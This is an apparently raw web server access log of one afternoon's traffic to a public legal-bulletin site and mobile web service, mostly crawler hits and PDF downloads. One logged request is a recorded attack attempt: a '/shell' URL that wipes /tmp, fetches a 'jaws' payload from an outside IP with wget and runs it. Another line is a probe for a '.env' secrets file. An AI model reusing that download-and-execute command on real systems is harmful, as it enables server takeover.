186.102.54.8 - - [02/Apr/2022:15:59:13 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.54.8 - - [02/Apr/2022:15:59:13 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.54.8 - - [02/Apr/2022:15:59:18 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
172.22.2.4 - - [02/Apr/2022:15:57:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.54.8 - - [02/Apr/2022:15:59:18 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.54.8 - - [02/Apr/2022:15:59:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+1Ng+AYis5h2uYQXhOXRcBRYcmmNBi3dLbNtsyODnsJuDG9ITyBlxW5/dAEPaiJVOfWRF/Crwaeey96tIYm/SBZVNItb9EW/DTfb3OKstyuaAYuonTpxxYNUjWHH5KuPVcFtc+48DuqzTFinkssN3fkikdwHAA6VM5EVbj3mJAoA1VITEO6ql6rxE7khXYZTzTUGOMQ6bpFjb4+no7DBcc/g7FFixTOU/+//Yz2A11OvMVtDfOlkLU2fru/xXYJyxLg0tmpr6GSw==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18UUm+5QzF8YpLdM7Dx3qjqyyaQrS/2ibzeWWllGTV662CEfVvyEAB3T1Cw4Nr+tYfpxf1l0jmoB37SwRoMqBcHQlm5U4G14szrscU+BJkt5YvlxnlxAr5A/rI+w77veTYcDjDZ/tsHvv4/F5SZ1w28maCd18BbNG++FiGEtrZJmNNhlfFzS3Dn+WT8f4f1KRdevM10CE95Nu7dEuX2PrCeMTHK3QOfQAABsoifGC4GR74QK2DxyUtYdjFVUM80Hd4b1w5o2Esrg3GYVJR0325WIb7tGWx2PZTafLgaVScwK3xxRX/c7mtcjyd4VMpuzk0xVosM46lDBdFdA1aqNXMlJg7flT+T2ZeoXiQQ0ev2sahcc+vqICPgqYVsk2N1fTIYlpQs+hv1twc6iUA1wNt+uKOJwtRil0uRSGo9nOV+XlloAguT3wfOC9qpw7FKbDkJHSU0LtyydrA2wHAig2A5F0lkeWNbU0LCFHBk9vGGR8qnfgP1K0LRPAaVhiJAA4gyn3jZVZsQqaAYvuaCD1QnX9R5tTkQaEryujGdILNTj/L+q6LqVgqkdenMzznfq0mZ+MaN2rgVXCfmiAvznP777jr6n8SkP2RmKY5vj2uAEX0f1MNk2aDyr3soluO3ojsviUR9WENb0hfespZZ6zeTqadTZwtJxNNtwdsq1+QCB3AF0AH8MCMJWC+KwZhNtdUSRQSNiDh+PnSi5aT+cunGEBWmZyyGqBa1RmTCqzvZ9QSF22dQd7NipjUlHD4hkSjBmUcHhhf3iR/Qif12eA4499lfiur6e6QiXr/MHYpTAwAO0VODi/jyWOrPDJNVNtwiLhTW6zcnZeHQlQGYpSiE8vZyhbojGXYxhpb434XVFMXkSBUJMvdK&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18HdV3vO2pDEuRai9seloZGqYl51O94qQMBmTHj7LPB6NetZaj2B+AhAyo2VX3x4w6ZvcmdVbmj1nHw0TWIQgqFh3G9rYgdSRaeQOsMjVfEPkMaS+d/vos+/4qeU1Pye+xJqZkSAS5Xnw3BDSOCZhjwkKnN7/yLUSA=&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/AScXPAtL+567cI1dGdwxN0rWSXVNnUZFz3ST7n0vDjvZoHxbG9TGoZi2siKPGgCFslfGPoGeDvTI2hL/vh4N2oHFBMTAGn+Bk0PtFI0WXq7H+bd3wINLSxXRVfkHrpto4SMHIOzvvtqgF8AqwpsIsPvQByGHGE1A=&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18X2Ny7oJI4kMBRJPIIErZUNMcurUd4IQP0DBa4z0/c95AcAD1Eu5Z0jyldeVaIqcK6w4uLtmj19CWXRm6YDLNWq5ln+LAoYvg1hHnRNOXckZ9aCjTW69p8QcRrBAHZ2rrIIblJndGMB47XAnWEB7UXBG620E1JFCw=&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+npxgFDWWv7xD6D7SN0gEWxILFlZyIlichfT+K+LW2dymLVugeatw+U1dbVR15iTherQPUqfIZKiRBVjbRZc5B3CwNT0lxAz6v2yv8nI6SxZk1qzjCdTBgyRJWuL2UAIXyKReHTmfKC0/Ka4qUrSCSRleckXi8ZyER1KeZ00sgQyWroFeGuDhya1kjrnIodrEn5kXX+lX1ng==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+YXdfBlvDLIbuYFxDveOm58cg4axa7fkAduKZV1AUpKf7FuVCCUZt3y7FRBf9V69WcoM8HbfDgHtCADlnTzhhkRFgqGCRK+DhBWo6StnQw4K5Mpwj19jkrcdb0AzxVrJuT5N4xgojfWFzdc38OHZ1iG2filYyuDNo2IefXYlLeT+UZfs/RXbbJp6/sNJsbSuaHNbz42h6RHg==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX199maFiF0MfoC5E+pGK0NcwdBemvWUjCFZ53M5lJnPPsAvRAaId8iyO2WnJ3MLPZpdGIpq8MIgmh/TsSDrRGfw7P/orcm1ZrV8Jyx/9KOTKFEj8NtwzuA9wtCk27WaCYR3yGjTGBz8WDgSRqoi8he/BPHAjUpmrW3J70d84QCqtxLhSJZrzyNpa&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Ru+XHKIcqZ0D1b794e9VVdpM+4NOEVuAQm+1vHehemskXPgp/Y9erfsm7VVAsPDm4gKKlbpe2wm/grUfRzVDveTA38iLOhlai3ROE0jV10B2TcPzyQwIOp5rknd7JJrj3/pN80iE8Iz7svSz7Bfre07qaSkB0vO4dqAkFNGZCA+3MJ69dHDJjXuEia70YkoId6gLu0mysaQ==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX198QrPuUmcyvNHBVrsmGibI2YtkJlU83Pxhje+ZjV4gJmoq0si6paD5i1X2FELV+xRLYkgh1PsFqU5irYiK3f5naZvRR/G9137unusy8nfQe0Rsic8OD7VIJFAWexjk41CtZEyLyIMhUYywCtnTtIRiM6StVguBRAN5SrujwC/Gv9K4CXud6VTn&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19cQ65J5t4yqUhZyei/y4kFU94+VS9SDpJaTi3k3Bv3zi4Xz+WqxRwalaTvJsiOPWrzn53Tb8VsJI7hDU5X8dbJ+hGHX99GdqtWd8BycZv/UM3WwzqDueNRe2+K+h9BRPBvV3WR3oee6yRWYwiOMhCdPTYDGv1+zbuWOssDEeGDhDKNEPHLwH4momWLj1UmZre2BVnJG55qqg==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
186.102.54.8 - - [02/Apr/2022:15:59:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19abuwnPkvMWqdGURixz4FjTBdbGHSHZh/rj5RPxsLEpPGoT5/fUvv8PWxj6XYV+ex2eBl3lebcOPo7Y3mgu0xjTo9k/Nzj/RZfhhlwkfbAaJrI/7M5xzsQO0mnaV1RXb8pnoth4XE9Y81J05pK0WB1kqIEuFf2vONGyLYGNfBLUYMtqTo+hKwzMSlhpBljFpkNOyUHK76lkw==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 25
197.63.105.187 - - [02/Apr/2022:16:00:09 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [02/Apr/2022:15:58:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
216.245.221.92 - - [02/Apr/2022:16:02:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:03:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:04:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
66.249.73.127 - - [02/Apr/2022:16:06:33 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2022:16:07:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:09:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:10:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [02/Apr/2022:16:12:03 -0500] "HEAD / HTTP/1.1" 200 -
35.240.26.48 - - [02/Apr/2022:16:12:26 -0500] "HEAD /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 -
66.249.73.127 - - [02/Apr/2022:16:13:45 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2022:16:15:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Apr/2022:16:17:03 -0500] "HEAD / HTTP/1.1" 200 -
186.102.34.7 - - [02/Apr/2022:16:17:30 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2022:16:15:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
186.102.54.8 - - [02/Apr/2022:16:19:37 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18IzoB1BqnPoCU4+5ks16bGrfnPRBChp2yxfmBedjqco2k6ZIWdrzrxEcHhUXTeQUhLn511PG+KvA==&y=U2FsdGVkX19lMjwvfla7XT6Mvy9ogbsMp6EQFHyPuA2pe2fa6oiq4cNFHL5HJ2nm HTTP/1.1" 200 30
186.102.54.8 - - [02/Apr/2022:16:19:44 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.54.8 - - [02/Apr/2022:16:19:44 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.54.8 - - [02/Apr/2022:16:19:48 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.54.8 - - [02/Apr/2022:16:19:48 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.54.8 - - [02/Apr/2022:16:19:57 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.54.8 - - [02/Apr/2022:16:19:57 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.54.8 - - [02/Apr/2022:16:20:02 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.54.8 - - [02/Apr/2022:16:20:02 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.54.8 - - [02/Apr/2022:16:20:41 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19GvUuweMfq/sVCuiFKjWFoZblr/DeOFhL898LZSY1g3UOdof7LTQQ+sBKjRIxRyfHHQlR2zvHRHr+NZ/FYJ1mPRA8Sepz3HfLQrTi/TnSmAo+BQ/JUkdiiaJFfJu7yJggKyYxHGOZ6GKkfdGtFH/z/t8mXLGBZrDvRPPYguyPgYvkkL9koK3bkQinoGNj4kyHLBlqOgcDnCnOVvnT4BnRyaSiRI0TQdHWIV7tVwUHdft199l2ZYzA9zKVJcnmgzLYwrcLn3RrEcQ==&u=U2FsdGVkX18CkIc4eM4M0hNgOrtfnKTCZBJHmkcG99Dr/Sus7uZteRD19ZSzSPt4&y=U2FsdGVkX18tGvbsF0NvOyFsnBBOtAz1XZH0cBBRnUKwr9l27NSDevz9sro2A+w2 HTTP/1.1" 200 66
216.245.221.92 - - [02/Apr/2022:16:22:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:20:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2022:16:22:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43372
172.22.2.4 - - [02/Apr/2022:16:21:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [02/Apr/2022:16:23:55 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [02/Apr/2022:16:24:03 -0500] "GET /BLA/boletinlegal/js/ajax_doctrina.js HTTP/1.1" 200 772
172.22.2.4 - - [02/Apr/2022:16:24:05 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
201.245.192.253 - - [02/Apr/2022:16:23:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45611
172.22.2.4 - - [02/Apr/2022:16:24:08 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [02/Apr/2022:16:24:12 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
66.249.73.127 - - [02/Apr/2022:16:25:11 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2022:16:27:03 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.199 - - [02/Apr/2022:16:27:05 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 303054
185.192.69.205 - - [02/Apr/2022:16:27:25 -0500] "GET /.env HTTP/1.1" 404 1018
185.192.69.205 - - [02/Apr/2022:16:27:27 -0500] "POST / HTTP/1.1" 200 319
172.22.2.4 - - [02/Apr/2022:16:26:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:27:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [02/Apr/2022:16:32:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2022:16:32:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43372
66.249.73.127 - - [02/Apr/2022:16:33:40 -0500] "-" 408 -
201.245.192.253 - - [02/Apr/2022:16:33:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45611
172.22.2.4 - - [02/Apr/2022:16:32:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.43 - - [02/Apr/2022:16:34:53 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
207.46.13.199 - - [02/Apr/2022:16:35:05 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [02/Apr/2022:16:33:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.252.107.9 - - [02/Apr/2022:16:35:41 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
216.245.221.92 - - [02/Apr/2022:16:37:03 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.189 - - [02/Apr/2022:16:37:49 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.189 - - [02/Apr/2022:16:37:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2F HTTP/1.1" 200 24571
186.84.20.189 - - [02/Apr/2022:16:38:08 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2FRES+2002+751-800%2F HTTP/1.1" 200 12567
186.84.20.189 - - [02/Apr/2022:16:38:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20751-800/2002RES764.tif HTTP/1.1" 200 271948
186.102.34.7 - - [02/Apr/2022:16:38:32 -0500] "-" 408 -
91.211.91.188 - - [02/Apr/2022:16:39:03 -0500] "HEAD / HTTP/1.0" 200 -
172.22.2.4 - - [02/Apr/2022:16:37:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60105
172.22.2.4 - - [02/Apr/2022:16:38:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:39:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [02/Apr/2022:16:41:17 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [02/Apr/2022:16:41:21 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
172.22.2.4 - - [02/Apr/2022:16:41:29 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [02/Apr/2022:16:41:32 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [02/Apr/2022:16:41:36 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [02/Apr/2022:16:41:42 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
172.22.2.4 - - [02/Apr/2022:16:41:47 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
172.22.2.4 - - [02/Apr/2022:16:41:51 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
172.22.2.4 - - [02/Apr/2022:16:41:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
216.245.221.92 - - [02/Apr/2022:16:42:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:42:06 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
207.46.13.209 - - [02/Apr/2022:16:42:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0252.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2022:16:42:15 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [02/Apr/2022:16:42:19 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
172.22.2.4 - - [02/Apr/2022:16:42:23 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
172.22.2.4 - - [02/Apr/2022:16:42:27 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
172.22.2.4 - - [02/Apr/2022:16:42:31 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
172.22.2.4 - - [02/Apr/2022:16:42:36 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [02/Apr/2022:16:42:39 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
172.22.2.4 - - [02/Apr/2022:16:42:47 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [02/Apr/2022:16:42:54 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
172.22.2.4 - - [02/Apr/2022:16:42:59 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
172.22.2.4 - - [02/Apr/2022:16:43:09 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
172.22.2.4 - - [02/Apr/2022:16:43:14 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
201.245.192.253 - - [02/Apr/2022:16:42:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43372
172.22.2.4 - - [02/Apr/2022:16:43:20 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
74.125.213.47 - - [02/Apr/2022:16:43:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
74.125.213.49 - - [02/Apr/2022:16:43:25 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
74.125.213.49 - - [02/Apr/2022:16:43:25 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [02/Apr/2022:16:43:28 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [02/Apr/2022:16:43:38 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [02/Apr/2022:16:43:47 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
172.22.2.4 - - [02/Apr/2022:16:43:54 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
172.22.2.4 - - [02/Apr/2022:16:44:00 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
172.22.2.4 - - [02/Apr/2022:16:44:07 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
201.245.192.253 - - [02/Apr/2022:16:43:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45611
172.22.2.4 - - [02/Apr/2022:16:44:13 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
172.22.2.4 - - [02/Apr/2022:16:44:21 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [02/Apr/2022:16:44:27 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
172.22.2.4 - - [02/Apr/2022:16:44:44 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
172.22.2.4 - - [02/Apr/2022:16:44:50 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
172.22.2.4 - - [02/Apr/2022:16:44:56 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 200 93580
172.22.2.4 - - [02/Apr/2022:16:45:07 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
172.22.2.4 - - [02/Apr/2022:16:45:12 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 200 1298384
172.22.2.4 - - [02/Apr/2022:16:45:32 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
172.22.2.4 - - [02/Apr/2022:16:45:37 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%208%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 963197
172.22.2.4 - - [02/Apr/2022:16:45:41 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
172.22.2.4 - - [02/Apr/2022:16:45:48 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%206%20del%2025%20de%20Mayo%20de%202012.pdf HTTP/1.1" 200 387391
172.22.2.4 - - [02/Apr/2022:16:45:53 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%205%20del%2027%20de%20Abril%20de%202012.pdf HTTP/1.1" 200 216613
172.22.2.4 - - [02/Apr/2022:16:45:58 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 200 253045
172.22.2.4 - - [02/Apr/2022:16:44:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
